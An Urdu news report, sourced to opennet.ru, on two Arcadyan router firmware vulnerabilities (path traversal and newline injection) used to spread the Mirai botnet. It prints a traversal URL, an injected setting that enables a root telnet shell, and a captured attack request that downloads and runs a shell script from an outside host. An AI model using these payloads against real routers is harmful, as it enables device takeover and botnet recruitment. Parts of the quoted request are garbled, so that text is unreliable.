گھریلو راؤٹرز میں کمزوری 17 مینوفیکچررز کو متاثر کرتی ہے۔

ہوم راؤٹرز کے خلاف نیٹ ورک پر ایک بہت بڑا حملہ ریکارڈ کیا گیا ہے جس کا فرم ویئر آرکیڈیان کمپنی کی طرف سے HTTP سرور کے نفاذ کا استعمال کرتا ہے۔ آلات پر کنٹرول حاصل کرنے کے لیے، دو کمزوریوں کا ایک مجموعہ استعمال کیا جاتا ہے جو روٹ رائٹس کے ساتھ صوابدیدی کوڈ کے ریموٹ پر عمل درآمد کی اجازت دیتا ہے۔ یہ مسئلہ Arcadyan، ASUS اور Buffalo کے ADSL راؤٹرز کی کافی وسیع رینج کو متاثر کرتا ہے، ساتھ ہی Beeline برانڈز کے تحت فراہم کردہ آلات (اس مسئلے کی تصدیق Smart Box Flash میں ہوئی ہے)، Deutsche Telekom، Orange، O2، Telus، Verizon، Vodafone اور دوسرے ٹیلی کام آپریٹرز۔ واضح رہے کہ Arcadyan کے فرم ویئر میں یہ مسئلہ 10 سال سے زیادہ عرصے سے موجود ہے اور اس دوران 20 مختلف مینوفیکچررز کے کم از کم 17 ڈیوائس ماڈلز میں منتقل ہونے میں کامیاب ہوا ہے۔

پہلی کمزوری، CVE-2021-20090، کسی بھی ویب انٹرفیس اسکرپٹ تک بغیر تصدیق کے رسائی ممکن بناتی ہے۔ کمزوری کا خلاصہ یہ ہے کہ ویب انٹرفیس میں، کچھ ڈائریکٹریز جن کے ذریعے تصاویر، سی ایس ایس فائلز اور جاوا اسکرپٹ اسکرپٹ بھیجے جاتے ہیں بغیر تصدیق کے قابل رسائی ہیں۔ اس معاملے میں، ڈائریکٹریز جن کے لیے بغیر تصدیق کے رسائی کی اجازت ہے، ابتدائی ماسک کا استعمال کرتے ہوئے چیک کیا جاتا ہے۔ پیرنٹ ڈائرکٹری میں جانے کے لیے راستوں میں "../" حروف کی وضاحت کرنا فرم ویئر کے ذریعے مسدود ہے، لیکن "..%2f" مجموعہ استعمال کرنا چھوڑ دیا گیا ہے۔ اس طرح، "http://192.168.1.1/images/..%2findex.htm" جیسی درخواستیں بھیجتے وقت محفوظ صفحات کو کھولنا ممکن ہے۔

دوسری کمزوری، CVE-2021-20091، ایک مستند صارف کو app_abstract.cgi اسکرپٹ پر خصوصی طور پر فارمیٹ شدہ پیرامیٹرز بھیج کر ڈیوائس کی سسٹم سیٹنگز میں تبدیلیاں کرنے کی اجازت دیتی ہے، جو پیرامیٹرز میں نئی ​​لائن کیریکٹر کی موجودگی کی جانچ نہیں کرتی ہے۔ . مثال کے طور پر، ایک پنگ آپریشن کرتے وقت، ایک حملہ آور فیلڈ میں "192.168.1.2%0AARC_SYS_TelnetdEnable=1" قدر کی وضاحت کر سکتا ہے جس میں IP ایڈریس چیک کیا جا رہا ہے، اور اسکرپٹ کو، سیٹنگز فائل بناتے وقت /tmp/etc/config/ .glbcfg، اس میں "AARC_SYS_TelnetdEnable=1" لائن لکھے گا، جو telnetd سرور کو چالو کرتا ہے، جو روٹ رائٹس کے ساتھ غیر محدود کمانڈ شیل تک رسائی فراہم کرتا ہے۔ اسی طرح، AARC_SYS پیرامیٹر ترتیب دے کر، آپ سسٹم پر کسی بھی کوڈ پر عمل درآمد کر سکتے ہیں۔ پہلا خطرہ "/images/..%2fapply_abstract.cgi" کے طور پر اس تک رسائی کے ذریعے بغیر تصدیق کے ایک مشکل اسکرپٹ کو چلانا ممکن بناتا ہے۔

کمزوریوں کا فائدہ اٹھانے کے لیے، حملہ آور کو اس نیٹ ورک پورٹ پر درخواست بھیجنے کے قابل ہونا چاہیے جس پر ویب انٹرفیس چل رہا ہے۔ حملے کے پھیلاؤ کی حرکیات کو دیکھتے ہوئے، بہت سے آپریٹرز سپورٹ سروس کے ذریعے مسائل کی تشخیص کو آسان بنانے کے لیے بیرونی نیٹ ورک سے اپنے آلات تک رسائی چھوڑ دیتے ہیں۔ اگر انٹرفیس تک رسائی صرف اندرونی نیٹ ورک تک محدود ہے تو، "DNS ری بائنڈنگ" تکنیک کا استعمال کرتے ہوئے ایک بیرونی نیٹ ورک سے حملہ کیا جا سکتا ہے۔ راؤٹرز کو میرائی بوٹ نیٹ سے جوڑنے کے لیے کمزوریاں پہلے سے ہی فعال طور پر استعمال ہو رہی ہیں: POST /images/..%2fapply_abstract.cgi HTTP/1.1 کنکشن: بند صارف ایجنٹ: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_address=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0&%212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

ماخذ: opennet.ru

نیا تبصرہ شامل کریں